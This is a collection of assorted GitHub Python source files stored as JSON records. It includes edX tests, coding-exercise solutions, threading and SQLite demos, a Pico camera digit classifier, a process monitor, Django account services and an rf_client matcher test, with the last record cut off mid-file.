+{"seq_id":"27953206824","text":"\"\"\"\nTests for the Cornerstone content metadata transmitter.\n\"\"\"\n\nimport unittest\nfrom datetime import datetime\nfrom unittest import mock\n\nfrom pytest import mark\n\nfrom integrated_channels.cornerstone.transmitters.content_metadata import CornerstoneContentMetadataTransmitter\nfrom integrated_channels.integrated_channel.models import ContentMetadataItemTransmission\nfrom test_utils import factories\n\n\n@mark.django_db\nclass TestCornerstoneContentMetadataTransmitter(unittest.TestCase):\n \"\"\"\n Tests for the class ``CornerstoneContentMetadataTransmitter``.\n \"\"\"\n\n def setUp(self):\n super().setUp()\n enterprise_customer = factories.EnterpriseCustomerFactory(name='Starfleet Academy')\n self.enterprise_customer_catalog = factories.EnterpriseCustomerCatalogFactory(\n enterprise_customer=enterprise_customer\n )\n self.enterprise_config = factories.CornerstoneEnterpriseCustomerConfigurationFactory(\n enterprise_customer=enterprise_customer\n )\n\n # @mock.patch('integrated_channels.cornerstone.transmitter.content_metadata._log_info')\n def test_cornerstone_transmitter_transmit_method_noop(self):\n record = factories.ContentMetadataItemTransmissionFactory(\n enterprise_customer=self.enterprise_config.enterprise_customer,\n plugin_configuration_id=self.enterprise_config.id,\n integrated_channel_code=self.enterprise_config.channel_code(),\n remote_created_at=datetime.utcnow(),\n remote_updated_at=None,\n )\n transmitter = CornerstoneContentMetadataTransmitter(self.enterprise_config)\n transmitter._log_info = mock.MagicMock() # pylint: disable=protected-access\n\n transmitter.transmit({record.content_id: record}, {}, {})\n transmitter._log_info.assert_called_with( # pylint: disable=protected-access\n f'Cornerstone base transmission invoked for config: {self.enterprise_config.id}. 
Treating as a NOOP'\n )\n\n def test_transmit_content_metadata_updates_records(self):\n \"\"\"\n Test that the Cornerstone content metadata transmitter transmit for web method generates and updates the\n appropriate content records as well as returns a transmit payload of both update and create content.\n \"\"\"\n self.enterprise_config.transmission_chunk_size = 3\n self.enterprise_config.save()\n content_id_1 = 'content_id_1'\n content_id_2 = 'content_id_2'\n content_id_3 = 'content_id_3'\n past_transmission_to_update = factories.ContentMetadataItemTransmissionFactory(\n content_id=content_id_1,\n enterprise_customer=self.enterprise_config.enterprise_customer,\n plugin_configuration_id=self.enterprise_config.id,\n integrated_channel_code=self.enterprise_config.channel_code(),\n content_last_changed='2021-07-16T15:11:10.521611Z',\n enterprise_customer_catalog_uuid=self.enterprise_customer_catalog.uuid,\n channel_metadata={},\n remote_created_at=datetime.utcnow(),\n remote_updated_at=None,\n )\n past_transmission_to_delete = factories.ContentMetadataItemTransmissionFactory(\n content_id=content_id_2,\n enterprise_customer=self.enterprise_config.enterprise_customer,\n plugin_configuration_id=self.enterprise_config.id,\n integrated_channel_code=self.enterprise_config.channel_code(),\n content_last_changed='2021-07-16T15:11:10.521611Z',\n enterprise_customer_catalog_uuid=self.enterprise_customer_catalog.uuid,\n remote_created_at=datetime.utcnow(),\n remote_deleted_at=None,\n )\n new_transmission_to_create = factories.ContentMetadataItemTransmissionFactory(\n content_id=content_id_3,\n enterprise_customer=self.enterprise_config.enterprise_customer,\n plugin_configuration_id=self.enterprise_config.id,\n integrated_channel_code=self.enterprise_config.channel_code(),\n content_last_changed='2021-07-16T15:11:10.521611Z',\n enterprise_customer_catalog_uuid=self.enterprise_customer_catalog.uuid,\n remote_created_at=None,\n )\n\n new_channel_metadata = {\n 'title': 'edX Demonstration Course',\n 'key': content_id_1,\n 'content_type': 'course',\n 'start': '2030-01-01T00:00:00Z',\n 'end': '2030-03-01T00:00:00Z'\n }\n past_transmission_to_update.channel_metadata = new_channel_metadata\n\n transmitter = CornerstoneContentMetadataTransmitter(self.enterprise_config)\n\n create_payload = {\n content_id_3: new_transmission_to_create\n }\n update_payload = {\n content_id_1: past_transmission_to_update\n }\n delete_payload = {\n content_id_2: past_transmission_to_delete\n }\n transmitter.transmit_for_web(create_payload, update_payload, delete_payload)\n item_updated = ContentMetadataItemTransmission.objects.filter(\n enterprise_customer_catalog_uuid=self.enterprise_customer_catalog.uuid,\n content_id=content_id_1,\n ).first()\n assert item_updated.remote_updated_at\n assert item_updated.channel_metadata == new_channel_metadata\n item_deleted = ContentMetadataItemTransmission.objects.filter(\n enterprise_customer_catalog_uuid=self.enterprise_customer_catalog.uuid,\n content_id=content_id_2,\n ).first()\n assert item_deleted.remote_deleted_at\n item_created = ContentMetadataItemTransmission.objects.filter(\n enterprise_customer_catalog_uuid=self.enterprise_customer_catalog.uuid,\n content_id=content_id_3,\n ).first()\n assert 
item_created.remote_created_at\n","repo_name":"openedx/edx-enterprise","sub_path":"tests/test_integrated_channels/test_cornerstone/test_transmitters/test_content_metadata.py","file_name":"test_content_metadata.py","file_ext":"py","file_size_in_byte":5845,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"70"}
+{"seq_id":"6229487661","text":"class calisan():\r\n\r\n\r\n zam_oranı = 1.05\r\n per_say = 0\r\n\r\n def __init__(self,ad,soyad,maas):\r\n self.ad = ad\r\n self.soyad = soyad\r\n self.maas = maas\r\n self.eposta = self.ad+self.soyad+\"@sirket.com\"\r\n calisan.per_say +=1\r\n\r\n def tamad(self):\r\n return \"adı : {} soyadı : {}\".format(self.ad, self.soyad)\r\n\r\n def arttir(self):\r\n # self.maas = (self.maas*1.05)\r\n # self.maas = (self.maas * calisan.zam_oranı)\r\n self.maas = (self.maas * self.zam_oranı)\r\n\r\n\r\n\r\n\r\nclass gelistirici(calisan):#çalışandan gelistirici sınıfını üretmek\r\n def __init__(self, ad, soyad, maas, p_dili):\r\n # calisan.__init__(self,ad,soyad,maas)\r\n super().__init__(ad, soyad, maas)\r\n self.p_dili = p_dili\r\n self.zam_oranı = 1.2\r\nclass yonetici(calisan):\r\n\r\n def __init__(self,ad,soyad,maas,calisan= None):\r\n super().__init__(ad,soyad,maas)\r\n if calisan is None:\r\n self.calisan= []\r\n else:\r\n self.calisan = calisan\r\n\r\n def eleman_ekle(self,eleman):\r\n self.calisan.append(eleman)\r\n\r\n def calisan_listele(self):\r\n\r\n for eleman in calisan:\r\n print(eleman.tamad())\r\n\r\npersonel1 = calisan(\"ali\",\"demir\",2500)\r\npersonel2 = calisan(\"kerim\",\"bakir\",1950)\r\n\r\ngel1 = gelistirici(\"mehmet\",\"can\",2250,\"Python\")\r\n# print(gel1.tamad(), gel1.p_dili, gel1.maas)\r\ngel1.arttir()\r\n# print(gel1.maas)\r\n\r\nyonet1 = yonetici(\"kamil\",\"eren\",6500,[gel1,personel1])\r\nprint(yonet1.tamad())\r\nprint(yonet1.calisan_listele())\r\nyonet1.eleman_ekle(personel2)\r\nprint(yonet1.calisan_listele())\r\nyonet1.eleman_cikar(gel1)\r\nprint(yonet1.calisan_listele())\r\n\r\nprint(isinstance(personel2,yonetici))\r\n\r\nprint(issubclass(calisan,yonetici))\r\nprint(issubclass(gelistirici,calisan))","repo_name":"KadirTaban/OOP","sub_path":"oop_4.py","file_name":"oop_4.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"17130868675","text":"import json\nimport os.path as path\nfrom containers.container import Container\n\n\ndef write_data(in_data) -> None:\n out_data = []\n\n for item in in_data:\n out_data.append(item.__dict__)\n\n json_object = json.dumps(out_data)\n f = open(\"db/data.json\", \"w\")\n f.write(json_object)\n\n\ndef read_data() -> Container:\n container = Container()\n if not path.isfile(\"db/data.json\"):\n return container\n\n f = open(\"db/data.json\")\n data = json.load(f)\n\n for item in data:\n container.store(item[\"name\"])\n\n return container\n","repo_name":"JimmyCamus/PYTHON-Change-Wallpaper","sub_path":"utils/handle_db.py","file_name":"handle_db.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"29566424101","text":"'''\n654. Maximum Binary Tree\n\nGiven an integer array with no duplicates. A maximum tree building on this array is defined as follow:\n\nThe root is the maximum number in the array.\nThe left subtree is the maximum tree constructed from left part subarray divided by the maximum number.\nThe right subtree is the maximum tree constructed from right part subarray divided by the maximum number.\nConstruct the maximum tree by the given array and output the root node of this tree.\n\nExample 1:\nInput: [3,2,1,6,0,5]\nOutput: return the tree root node representing the following tree:\n\n 6\n / \\\n 3 5\n \\ / \n 2 0 \n \\\n 1\nNote:\nThe size of the given array will be in the range [1,1000].\n'''\n\nfrom typing import List\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n def printTree(self):\n if self.left != None:\n self.left.printTree()\n\n print(self.val)\n\n if self.right != None:\n self.right.printTree()\n\nclass Solution:\n\n # Recursive solution in O(n)\n def constructMaximumBinaryTree(self, nums: List[int]) -> TreeNode:\n \n if len(nums) <= 0:\n return None\n\n i = v = -1\n for c, n in enumerate(nums):\n if n > v:\n v = n\n i = c\n\n node = TreeNode(v)\n node.left = self.constructMaximumBinaryTree(nums[0:i])\n node.right = self.constructMaximumBinaryTree(nums[i+1:])\n return node\n\ns = Solution()\nnode = s.constructMaximumBinaryTree([3,2,1,6,0,5])\nnode.printTree()","repo_name":"AWAlexWeber/python-practice","sub_path":"LeetCode/Solved/Medium/MaximumBinaryTree.py","file_name":"MaximumBinaryTree.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"33390525341","text":"\r\nfrom sqlite3 import*\r\nconnection=sqlite3.connect(\"test.db\")\r\ncursor=connection.cursor()#adds cursor -what you use to interact with database\r\n\r\n\r\ncursor.execute(\"\"\"create table IF NOT EXISTS testone \r\n(one integer\r\n,two text\r\n,three text\r\n,four text\r\n)\"\"\")#inside are columns/categorys\r\n\r\n#inserting data into database\r\ncursor.execute(\"INSERT INTO testone VALUES ('1','steve','bob','jeff')\")\r\n\r\n\r\nconnection.commit()#pushes changes into database\r\n\r\ncursor.execute(\"SELECT*FROM testone\")#selects a table in database\r\nresults=cursor.fetchall()#selects everything within that table\r\nprint(results)\r\nconnection.close()\r\n","repo_name":"Edt12/Tests-and-Experiments","sub_path":"Sqlite test.py","file_name":"Sqlite test.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"34644710855","text":"\"\"\"\n Insert Node at a specific position in a linked list\n head input could be None as well for empty list\n Node is defined as\n\n class Node(object):\n\n def __init__(self, data=None, next_node=None):\n self.data = data\n self.next = next_node\n\n return back the head of the linked list in the below method.\n\n This is a \"method-only\" submission.\n You only need to complete this method.\n\"\"\"\n\nfrom Node import Node\n\n\ndef insert_nth(head, data, position):\n if position == 0:\n return Node(data, head)\n\n current = head\n prev = Node()\n p = Node(data, None)\n pos = 0\n while current:\n pos += 1\n prev = current\n current = current.next\n if pos == int(position):\n prev.next = p\n p.next = current\n return head\n","repo_name":"darwinz/hackerrank","sub_path":"data-structures/python/linked-list-insert-node-at-nth.py","file_name":"linked-list-insert-node-at-nth.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"70545451108","text":"\"\"\"Producer - Consumer pattern.\n\nThis script goes on forever. Terminate it with Ctrl+C.\n\nSome producer/s thread/s produce/s some sort of data or item and put it into a SHARED buffer (here is a simple python list).\nProducer threads should not put more data than the buffer can contain.\n\nSome consumer/s thread/s fetch/es the data from the buffer.\nConsumer thread should not read from an empty buffer.\n\nUsage:\n $ python producer_consumer_pattern.py\n\nSee Also:\n producer_consumer_queue.py\n\"\"\"\nimport time\nimport random\nimport argparse\nimport threading\nfrom argparse import RawDescriptionHelpFormatter\n\n# we use a list to act as the shared buffer\noperands = []\n\n# event used to understand whether the shared buffer is accessible or not\nevent = threading.Event()\n\n\nclass Producer(threading.Thread):\n\n def run(self):\n while True:\n (x, y) = random.randint(1, 100000), random.randint(1, 100000)\n operands.append((x, y))\n print(f\"{self.name} added: ({x}, {y})\")\n # set an event to communicate that the buffer can be read by a consumer thread\n event.set()\n time.sleep(random.random())\n\n\nclass Consumer(threading.Thread):\n\n def run(self):\n while True:\n time.sleep(random.random())\n # wait for an event to avoid reading from an empty buffer. This event is set by the producer thread\n event.wait()\n (x, y) = operands.pop()\n print(f\"Product of ({x}*{y}) = {x*y}\")\n # clear the event, so the producer thread can set it again\n event.clear()\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=__doc__, formatter_class=RawDescriptionHelpFormatter\n )\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n Producer().start()\n Consumer().start()\n","repo_name":"jackdbd/concurrent-programming-python","sub_path":"producer_consumer_pattern.py","file_name":"producer_consumer_pattern.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"14180780734","text":"''' min/max '''\n\n# 10818번\nn = int(input())\nnumList = list(map(int, input().split()))\nnumList.sort()\nprint(numList[0], numList[-1])\n\n# 2562번 (파이참 결과는 맞는데 백준 제출은 틀렸습니다?)\nnumList, max= [], 0\nfor i in range(10):\n numList.append(int(input()))\n if numList[i-1] < numList[i]:\n max = numList[i]\nprint(max, numList.index(max)+1, sep=\"\\n\") #인덱스 0부터 시작하기 때문에 +1\n\n# 2562번 => max함수 사용\nnumList=[]\nfor i in range(9):\n numList.append(int(input()))\nprint(max(numList), numList.index(max(numList))+1, sep=\"\\n\")\n","repo_name":"jin-hyojoo/study__algorithm","sub_path":"단계별 풀어보기/One-Dimensional Arrays/q_10818, 2562.py","file_name":"q_10818, 2562.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72329559586","text":"import gc\nimport sys\nfrom time import sleep\n\nimport bitmaptools\nimport board\nimport busio\nimport digitalio\nimport displayio\nimport svm_min\nimport terminalio\nfrom adafruit_bitmap_font import bitmap_font\nfrom adafruit_display_text import label\nfrom adafruit_ov7670 import OV7670\nfrom adafruit_st7735r import ST7735R\n\n\n# Function to convert RGB565_SWAPPED to grayscale\ndef rgb565_to_1bit(pixel_val):\n pixel_val = ((pixel_val & 0x00FF)<<8) | ((25889 & 0xFF00) >> 8)\n r = (pixel_val & 0xF800)>>11\n g = (pixel_val & 0x7E0)>>5\n b = pixel_val & 0x1F\n return (r+g+b)/128\n\n\n#Setting up the TFT LCD display\nmosi_pin = board.GP11\nclk_pin = board.GP10\nreset_pin = board.GP17\ncs_pin = board.GP18\ndc_pin = board.GP16\n\ndisplayio.release_displays()\nspi = busio.SPI(clock=clk_pin, MOSI=mosi_pin)\ndisplay_bus = displayio.FourWire(\n spi, command=dc_pin, chip_select=cs_pin, reset=reset_pin\n)\n\ndisplay = ST7735R(display_bus, width=128, height=160, bgr=True)\ngroup = displayio.Group( scale=1)\ndisplay.show(group)\n\nfont = bitmap_font.load_font(\"./Helvetica-Bold-16.bdf\")\ncolor = 0xffffff\ntext_area = label.Label(font, text='', color=color)\ntext_area.x = 10\ntext_area.y = 140\ngroup.append(text_area)\n\ncam_width = 80\ncam_height = 60\ncam_size = 3 #80x60 resolution\n\ncamera_image = displayio.Bitmap(cam_width, cam_height, 65536)\ncamera_image_tile = displayio.TileGrid(\n camera_image ,\n pixel_shader=displayio.ColorConverter(\n input_colorspace=displayio.Colorspace.RGB565_SWAPPED\n ),\n x=30,\n y=30,\n)\ngroup.append(camera_image_tile)\ncamera_image_tile.transpose_xy=True\n\ninference_image = displayio.Bitmap(12,12, 65536)\n\n#Setting up the camera\ncam_bus = busio.I2C(board.GP21, board.GP20)\n\ncam = OV7670(\n cam_bus,\n data_pins=[\n board.GP0,\n board.GP1,\n board.GP2,\n board.GP3,\n board.GP4,\n board.GP5,\n board.GP6,\n board.GP7,\n ],\n clock=board.GP8,\n vsync=board.GP13,\n href=board.GP12,\n mclk=board.GP9,\n shutdown=board.GP15,\n reset=board.GP14,\n)\ncam.size = cam_size\ncam.flip_y = True\n\nctr = 0\nwhile True:\n cam.capture(camera_image)\n sleep(0.1)\n temp_bmp = displayio.Bitmap(cam_height, cam_height, 65536)\n for i in range(0,cam_height):\n for j in range(0,cam_height):\n temp_bmp[i,j] = camera_image[i,j]\n bitmaptools.rotozoom(inference_image,temp_bmp,scale=12/cam_height,ox=0,oy=0,px=0,py=0)\n del(temp_bmp)\n\n input_data = []\n for i in range(0,12):\n for j in range(0,12):\n gray_pixel = 1 -rgb565_to_1bit(inference_image[i,j])\n if gray_pixel < 0.5:\n gray_pixel = 0\n input_data.append(gray_pixel)\n\n camera_image.dirty()\n display.refresh(minimum_frames_per_second=0)\n prediction = svm_min.score(input_data)\n #Uncomment these lines for debugging\n ctr = ctr + 1\n if ctr%50 == 0:\n print(input_data)\n print(\"------\")\n res = prediction.index(max(prediction))\n #print(res)\n text_area.text = \"Prediction : \" +str(res)\n sleep(0.01)\n\n","repo_name":"code2k13/rpipico_digit_classification","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"70"}
+{"seq_id":"40136415877","text":"\"\"\"\nprocess_list.py can send the entire process list in a dict, with event_type: process_list (initially)\n\t\t\t\tand will ping the server when there's a change in the process list with a dict \n\t\t\t\tof the additional or removed process(es), with event_type: process_update\n\"\"\"\n\nimport psutil\nfrom time import time, sleep\nimport json\nimport requests\n\n# with stored names\ndef get_procs_list():\n\tfetched_procs = list(psutil.process_iter())\n\tprocs_id_name = {}\n\tprocs = []\n\tfor p in fetched_procs:\n\t\tprocs.append(p)\n\t\ttry:\n\t\t\tp_name = p.name()\n\t\texcept:\n\t\t\tp_name = None\n\t\tprocs_id_name[p.pid] = p_name\n\treturn procs, procs_id_name\n\ndef on_terminate(proc):\n\tprint(\"Process {} terminated with exit code {}\".format(proc, proc.returncode))\n\ndef detect_terminate(procs):\n\tterminated, alive = psutil.wait_procs(procs, timeout=2, callback=on_terminate)\n\treturn terminated, alive\n\ndef detect_add(procs, new_procs):\n\tadded = []\n\tfor p in new_procs:\n\t\tif p not in procs:\n\t\t\tadded.append(p)\n\treturn added\n\ndef post_procs_list(procs, url, event_type):\n\tdata = {}\n\tfor p in procs:\n\t\ttry:\n\t\t\tp_name = p.name()\n\t\t\tdata[p.pid] = p_name\n\t\texcept:\n\t\t\tprint(\"Process {} had no name\".format(p))\n\t\t\tpass\n\tevent = json.dumps({\"event_type\": \"process_list\", \"procs\": data})\n\tresponse = requests.post(url, data=json.dumps(event), headers={\"Content-type\": \"application/json\"})\n\treturn response\n\nif __name__ == \"__main__\":\n\told_procs, old_procs_id_name = get_procs_list()\n\tprocs, procs_id_name = old_procs[:], old_procs_id_name\n\n\turl = \"http://0.0.0.0:8080/event_trigger\"\n\tresponse = post_procs_list(procs_id_name, url)\n\tprint(\"Posted procs list with response {}\".format(response))\n\n\t# detect terminated and added processes, then update process list\n\twhile True:\n\t\tterminated, alive = detect_terminate(procs)\n\t\tprint(\"Terminated: {}\".format(terminated))\n\t\tfor p in terminated:\n\t\t\tprint(\"Terminated pid: {}\".format(p.pid))\n\t\t\tif p.pid in old_procs_id_name:\n\t\t\t\tprint(\"Matched with old pid\")\n\t\t\t\tprint(\"Name of terminated process: {}\".format(old_procs_id_name[p.pid]))\n\t\t\tdel procs_id_name[p.pid]\n\t\t\t# get the mode in data obj's names (vals) -- should give mode and all\n\t\t\tevent = json.dumps({\"event_type\": \"process_update\", \"update_type\": \"termination\", \"proc\": procs_id_name, \"pid\": p.pid})\n\t\t\tresponse = requests.post(url, data=json.dumps(event), headers={\"Content-type\": \"application/json\"})\n\t\t\tprint(\"Posted termination of process {} with response {}\".format(p, response))\n\t\t\tprocs.remove(p)\n\t\tadded = detect_add(old_procs, procs)\n\t\tprint(\"Added: {}\".format(added))\n\t\tfor p in added:\n\t\t\ttry:\n\t\t\t\tp_name = p.name()\n\t\t\t\tprint('Name of added: {}'.format(p_name))\n\t\t\t\tprocs_id_name[p.pid] = p_name\n\t\t\texcept:\n\t\t\t\tprint('Cannot find name of {}'.format(p))\n\t\t\t\tpass\t\t\n\t\t\tevent = json.dumps({\"event_type\": \"process_update\", \"update_type\": \"addition\", \"proc\": procs_id_name, \"pid\": p.pid})\n\t\t\tresponse = requests.post(url, data=json.dumps(event), headers={\"Content-type\": \"application/json\"})\n\t\t\tprint(\"Posted addition of process {} with response {}\".format(p, response))\n\t\t\tprocs.append(p)\n\t\tprint(\"Size of procs list, old {}: new {}\".format(len(old_procs), len(procs)))\n\t\told_procs = procs[:]\n\t\tsleep(2.0 - time() % 2.0)\n\t\tprocs, 
procs_id_name = get_procs_list()\n\n\n","repo_name":"Ejhfast/virtual_assistant","sub_path":"process_list.py","file_name":"process_list.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"41389444697","text":"\"\"\"\r\nLibrary Fine: https://www.hackerrank.com/challenges/library-fine/problem\r\n\r\n\"\"\"\r\n\r\n#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\n# Complete the libraryFine function below.\r\ndef libraryFine(d1, m1, y1, d2, m2, y2):\r\n if y2>y1:\r\n return 0\r\n if y2==y1 and m2>m1:\r\n return 0\r\n if y2==y1 and m2==m1 and d2>d1:\r\n return 0\r\n \r\n fine=0\r\n if y1==y2:\r\n if m1==m2:\r\n fine=15*(d1-d2)\r\n else:\r\n fine=500*(m1-m2)\r\n else:\r\n fine=10000\r\n return fine\r\n\r\n\r\nif __name__ == '__main__':\r\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\r\n\r\n d1M1Y1 = input().split()\r\n\r\n d1 = int(d1M1Y1[0])\r\n\r\n m1 = int(d1M1Y1[1])\r\n\r\n y1 = int(d1M1Y1[2])\r\n\r\n d2M2Y2 = input().split()\r\n\r\n d2 = int(d2M2Y2[0])\r\n\r\n m2 = int(d2M2Y2[1])\r\n\r\n y2 = int(d2M2Y2[2])\r\n\r\n result = libraryFine(d1, m1, y1, d2, m2, y2)\r\n\r\n fptr.write(str(result) + '\\n')\r\n\r\n fptr.close()\r\n","repo_name":"arpita-ak/APS-2020","sub_path":"Hackerrank solutions/Easy- Library Fine.py","file_name":"Easy- Library Fine.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"1907343765","text":"from datetime import timedelta\nfrom django.utils import timezone\nfrom apps.core.services.controllers import ResponseController\nfrom ..models import ActivationCode, TBConfiguration, User, TBUserToken\nfrom apps.core.services.validators import ImageController\nfrom ...billing.models import Transaction, get_tezbor_account, UserAccount\nfrom ...core.services.generics import TBResponse\nfrom ...core.services.model_status import *\n\n\nclass TBException(ResponseController):\n\n def phone_number_isvalid(self):\n phone = self.request.data['phone_number']\n if len(phone) != 13 or not phone[1:].isnumeric() or phone[:4] != '+998' or phone[4:6] == \"69\":\n return False\n else:\n return True\n\n def user_exists(self, phone):\n if not self.phone_number_isvalid():\n self.update_error_text(catch=phone)\n self.code = TBResponse.CODE_6\n self.error_message = TBResponse.MSG_6\n return self.error_response()\n qs_user = User.objects.filter(phone_number=phone)\n if qs_user.exists():\n user = qs_user.first()\n self.update_error_text(catch=phone)\n if user.status == UserStatus.NOTACTIVATED:\n self.code = TBResponse.CODE_7\n self.error_message = TBResponse.MSG_7\n else:\n self.code = TBResponse.CODE_1\n self.error_message = TBResponse.MSG_1\n return self.error_response()\n else:\n return False\n\n\nclass AccountController(TBException, ImageController):\n\n def __init__(self, request=None):\n super().__init__(request)\n self.request = request\n\n @staticmethod\n def authentication(user, device, meta, dt):\n token = TBUserToken.objects.create(user=user, device_token=device, user_agent=str(meta), device_type=dt)\n return token.key\n\n @staticmethod\n def delete_access_token(token):\n qs = TBUserToken.objects.filter(key=token)\n if qs.exists():\n qs.delete()\n return True\n else:\n return False\n\n @staticmethod\n def delete_expired_code(phone, sms_type):\n qs_act = ActivationCode.objects.filter(phone=phone, sms_type=sms_type)\n if qs_act.exists():\n qs_act.delete()\n\n @staticmethod\n def not_expired(obj):\n now = timezone.now()\n timeout = TBConfiguration.get_config(key=\"expiration_sms_confirmation\", if_not_found=180000)\n end_time = obj.timestamp + timedelta(milliseconds=int(timeout))\n if now > end_time:\n return True\n else:\n return False\n\n def _get_or_create_confirmation_code(self, user, phone, sms_type):\n qs = ActivationCode.objects.filter(phone=phone, activated=False, sms_type=sms_type)\n if qs.exists():\n code = qs.first()\n is_not_expired = self.not_expired(obj=code)\n if not is_not_expired:\n obj = code\n else:\n self.delete_expired_code(phone=phone, sms_type=sms_type)\n obj = ActivationCode.objects.create(user=user, phone=phone, sms_type=sms_type)\n else:\n self.delete_expired_code(phone=phone, sms_type=sms_type)\n obj = ActivationCode.objects.create(user=user, phone=phone, sms_type=sms_type)\n return obj\n\n def resend_sms(self, user, phone, sms_type):\n code_created = self._get_or_create_confirmation_code(user=user, phone=phone, sms_type=sms_type)\n if code_created:\n return True\n else:\n return False\n\n def set_referrer(self, user):\n data = self.request.data\n if \"referrer\" in data:\n qs = User.objects.filter(phone_number=data[\"referrer\"])\n if qs.exists() and user.referrer is None:\n referrer = qs.first()\n user.referrer = referrer\n user.save(update_fields=[\"referrer\"])\n\n def update_referrer_balance(self, user):\n referral_fee = TBConfiguration.get_config(key=\"referral_fee\", if_not_found=5000)\n bonus = int(referral_fee)\n tb_account = 
get_tezbor_account()\n receivers = UserAccount.objects.filter(user=user.referrer, type=UserAccountType.TEZBOR)\n if tb_account and receivers.exists():\n receiver = receivers.first()\n try:\n Transaction.objects.create(\n payer=tb_account,\n receiver=receiver,\n paymethod=PaymentType.TEZBOR_PAYMENT,\n reason=TransactionType.RECEIVED_BY_REFERRING,\n amount=bonus)\n except Exception as e:\n print(\"update_referrer_balance......\", e.args)\n\n\n def get_tb_app_type(self):\n data = self.request.data\n # print(\"get_tb_app_type...\", data)\n if \"app_type\" in data:\n return data[\"app_type\"]\n else:\n return ApplicationType.CUSTOMER_APP\n\n def send_activation_code(self, user, phone):\n if user.status == UserStatus.TOBEACTIVATED or user.status == UserStatus.ACTIVATED or user.status == UserStatus.NOTACTIVATED:\n if self.resend_sms(user=user, phone=phone, sms_type=ActivationType.LOGIN):\n return self.success_response()\n else:\n self.code = TBResponse.CODE_30\n self.error_message = TBResponse.MSG_30\n return self.error_response()\n else:\n self.code = TBResponse.CODE_3\n self.error_message = TBResponse.MSG_3\n return self.error_response()\n\n\n\n","repo_name":"muhtor/micro-serice","sub_path":"server/src/apps/accounts/utils/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":5592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"440166579","text":"from datetime import datetime\nfrom typing import Optional, Dict\n\nfrom rf_api_client.models.node_types_api_models import NodeTypeDto\nfrom rf_api_client.models.nodes_api_models import NodeTreeDto, PositionType, NodeAccessType, NodeMetaDto, \\\n NodeTreeBodyDto, NodeBodyMetaDto, NodePropertiesDto, GlobalGroupDto, StyleGroupDto\n\nfrom rf_client.matchers import match_type_id, match_nontyped, match_type_name, match_typed_property, match_all, \\\n match_any\nfrom rf_client.tree_wrapper import NodeWrapper\n\n\ndef build_node(\n type_id: Optional[str] = None,\n type_props: Optional[Dict[str, str]] = None,\n) -> NodeWrapper:\n node, _ = NodeWrapper.from_tree_dto(\n NodeTreeDto(\n id='node_id',\n map_id='map-id',\n parent=None,\n original_parent=None,\n position=(PositionType.P, '0'),\n access=NodeAccessType.user_all,\n hidden=False,\n readers=[],\n node_level=0,\n meta=NodeMetaDto(\n creation_timestamp=datetime.utcfromtimestamp(0),\n author='',\n last_modified_timestamp=datetime.utcfromtimestamp(0),\n last_modified_user='',\n can_move=True,\n editable=True,\n commentable=True,\n can_set_access=True,\n leaf=True,\n ),\n body=NodeTreeBodyDto(\n id='node_id',\n map_id='map-id',\n type_id=type_id,\n parent=None,\n children=[],\n access=NodeAccessType.user_all,\n unread_comments_count=0,\n comments_count=0,\n readers=[],\n meta=NodeBodyMetaDto(\n creation_timestamp=datetime.utcfromtimestamp(0),\n author='',\n last_modified_timestamp=datetime.utcfromtimestamp(0),\n last_modified_user='',\n can_move=True,\n editable=True,\n commentable=True,\n can_set_access=True,\n subscribed=False,\n ),\n properties=NodePropertiesDto(\n global_=GlobalGroupDto(\n title='title',\n ),\n by_type=type_props or {},\n by_user=[],\n style=StyleGroupDto(),\n by_extension={},\n ),\n )\n )\n )\n return node\n\n\ndef build_type(type_id: str, type_name: str) -> NodeTypeDto:\n return NodeTypeDto(\n id=type_id,\n name=type_name,\n map_id='map-id',\n icon=None,\n displayable=True,\n default_child_node_type_id=None,\n properties=[],\n )\n\n\ndef test_type_id():\n node = build_node(type_id='test-type')\n assert match_type_id('test-type')(node)\n assert not match_type_id('another-type')(node)\n\n\ndef test_nontyped():\n node = build_node(type_id=None)\n assert match_nontyped()(node)\n assert not match_type_id('type-id')(node)\n\n\ndef test_type_name():\n types = [\n build_type(type_id='first-type', type_name='First'),\n build_type(type_id='second-type', type_name='Second'),\n ]\n\n first_node = build_node(type_id='first-type')\n assert match_type_name(types, 'First')(first_node)\n assert not match_type_name(types, 'Second')(first_node)\n assert not match_type_name(types, 'Unknown')(first_node)\n\n second_node = build_node(type_id='second-type')\n assert match_type_name(types, 'Second')(second_node)\n assert not match_type_name(types, 'First')(second_node)\n assert not match_type_name(types, 'Unknown')(second_node)\n\n\ndef test_type_property():\n node = build_node(type_props={\n 'Foo': 